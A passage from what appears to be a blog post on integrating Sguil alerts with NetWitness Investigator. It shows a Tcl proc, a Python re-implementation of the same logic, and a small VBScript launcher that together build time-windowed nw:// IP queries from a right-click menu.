foreach { currentMenu subcommand } { .ipQueryMenu.quickMenu "quick" .ipQueryMenu.advancedMenu "build" } {
....truncated for brevity; everything below should be as it was when you checked it out of CVS...
You can see we are calling a proc/function called NetWitness and passing it a variable for which address(es) we are interested in (and whether they are source or destination addresses) along with some predefined time periods. You have much better flexibility and control if you create these queries within NetWitness directly, but being able to right click makes for greater ease of use for analysts. This calls the NetWitness function that we have added to lib/extdata.tcl:
proc NetWitness { direction hours } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    # Addresses and timestamp of the selected alert (or SANCP session) row
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
        set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
        set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }
    # The menu's time period is centred on the alert: the 1 hour items give
    # +/-30 minutes, the others +/- half the requested number of hours
    if {$hours == 1} {
        set future [clock scan "30 minute" -base [clock scan $timestamp -gmt 1]]
        set past [clock scan "-30 minute" -base [clock scan $timestamp -gmt 1]]
    } else {
        set hours [expr {$hours / 2}]
        set future [clock scan "$hours hour" -base [clock scan $timestamp -gmt 1]]
        set past [clock scan "-$hours hour" -base [clock scan $timestamp -gmt 1]]
    }
    # Same YYYY-MM-DD+HH:MM:SS / %3A formatting as NetWitnessEvent
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]
    # One nw:// query per menu item; the "AsDst"/"AsSrc" variants look for the
    # alerted address on the other side of the session
    if { $direction == "Src" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$srcIP&time=$past+to+$future&where=ip.src%3D$srcIP"
    }
    if { $direction == "SrcAsDst" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$srcIP&time=$past+to+$future&where=ip.dst%3D$srcIP"
    }
    if { $direction == "Dst" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$dstIP&time=$past+to+$future&where=ip.dst%3D$dstIP"
    }
    if { $direction == "DstAsSrc" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$dstIP&time=$past+to+$future&where=ip.src%3D$dstIP"
    }
    if { $direction == "SrcToDst" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$srcIP+-%3E+$dstIP&time=$past+to+$future&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP"
    }
    if { $direction == "DstToSrc" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$dstIP+-%3E+$srcIP&time=$past+to+$future&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP"
    }
}
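Both procs above (NetWitnessEvent and NetWitness) build the same family of nw:// URLs by interpolating alert fields into hand-encoded strings. As an added example that is not part of the original post or of Sguil/NetWitness, the same URL construction in Python, with the percent-encoding done by urllib and the time-window arithmetic in one place, so the output can be checked against the Tcl without a Sguil client. It assumes Sguil's column names, a "YYYY-MM-DD HH:MM:SS" timestamp, and the broker name "broker" from the post's URLs; the sample alert row is constructed.

```python
# Added example, not from the original post or from Sguil/NetWitness: the nw://
# URL building of the NetWitnessEvent and NetWitness procs above, in Python so it
# can be tested. Assumes Sguil column names, "YYYY-MM-DD HH:MM:SS" timestamps
# and the broker name "broker" from the post's URLs.
from datetime import datetime, timedelta
from urllib.parse import quote_plus
PROTO_NAMES = {6: "TCP", 17: "UDP", 1: "ICMP"}   # the only types the procs handle
SAMPLE_ALERT = {"srcip": "10.0.0.5", "srcport": 49152, "dstip": "203.0.113.7",  # constructed
                "dstport": 80, "ipproto": 6, "date": "2010-02-15 14:03:10"}      # sample row

def time_window(timestamp, half_width):
    """(past, future) as YYYY-MM-DD+HH:MM:SS with ':' escaped to %3A, like the Tcl."""
    base = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S")
    fmt = lambda t: t.strftime("%Y-%m-%d+%H:%M:%S").replace(":", "%3A")
    return fmt(base - half_width), fmt(base + half_width)

def session_url(alert, direction="from", broker="broker"):
    """NetWitnessEvent: one session, +/-2 min; "to" swaps src/dst (session aware)."""
    src, sport, dst, dport = alert["srcip"], alert["srcport"], alert["dstip"], alert["dstport"]
    if direction == "to":
        src, sport, dst, dport = dst, dport, src, sport
    proto = alert["ipproto"]
    if proto not in PROTO_NAMES:            # the Tcl proc silently does nothing here
        raise ValueError(f"unsupported ip.proto {proto}")
    past, future = time_window(alert["date"], timedelta(minutes=2))
    if proto == 1:
        name = f"ICMP || {src} -> {dst}"
        where = f"ip.src={src} && ip.dst={dst} && ip.proto=1"
    else:
        l4 = PROTO_NAMES[proto].lower()     # tcp.srcport / udp.srcport keys
        name = f"{PROTO_NAMES[proto]} || {src}:{sport} -> {dst}:{dport}"
        where = f"ip.src={src} && {l4}.srcport={sport} && ip.dst={dst} && {l4}.dstport={dport}"
    return f"nw://{broker}/?name={quote_plus(name)}&time={past}+to+{future}&view=session&where={quote_plus(where)}"

def ip_url(alert, direction="Src", hours=1, broker="broker"):
    """NetWitness: IP query over `hours` centred on the alert (1 h => +/-30 min)."""
    src, dst = alert["srcip"], alert["dstip"]
    half = timedelta(minutes=30) if hours == 1 else timedelta(hours=hours // 2)
    past, future = time_window(alert["date"], half)
    clauses = {   # menu direction -> (query name, where clause), before encoding
        "Src": (f"ip.src={src}", f"ip.src={src}"),
        "SrcAsDst": (f"ip.dst={src}", f"ip.dst={src}"),
        "Dst": (f"ip.dst={dst}", f"ip.dst={dst}"),
        "DstAsSrc": (f"ip.src={dst}", f"ip.src={dst}"),
        "SrcToDst": (f"{src} -> {dst}", f"ip.src={src} && ip.dst={dst}"),
        "DstToSrc": (f"{dst} -> {src}", f"ip.src={dst} && ip.dst={src}"),
    }
    name, where = clauses[direction]
    return f"nw://{broker}/?name={quote_plus(name)}&time={past}+to+{future}&where={quote_plus(where)}"
```

The strings this produces match what the Tcl exec lines hand to nw.vbs, so a mismatch after a change to either side shows up as a failed comparison rather than an empty Investigator tab.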
Now we can right click on IPs within Sguil and use the alert data to perform these SANCP-style queries in NetWitness, as shown below:

You may have noticed that the nw://<url>s are being passed to a Visual Basic script named nw.vbs in the analyst account's home directory. We had some issues executing very long commands from within Tcl and ran into 8.3 filename limitations as well. The VBScript is very simple and uses the Run method to execute explorer.exe, passing it the URL we have formed to perform the query in NetWitness Investigator. If NetWitness Investigator is not running, it will open and prompt you for your authentication credentials. If it is already open, it will just create a new tab in Investigator and display the sessions/reports. The contents of the nw.vbs file are as follows; it may look odd, but in VBScript you have to escape quotes with quotes, so it looks like we have gone quote crazy:
' nw.vbs: launch explorer.exe with the nw:// URL that Sguil passed as the first argument.
' In VBScript a literal double quote inside a string is written as two quotes,
' so """" is a single " character.
Set objShell = WScript.CreateObject("WScript.Shell")
Set ArgObj = WScript.Arguments
Cmd = """" & "c:\windows\system32\explorer.exe" & """" & " " & """" & ArgObj.Item(0) & """"
objShell.Run Cmd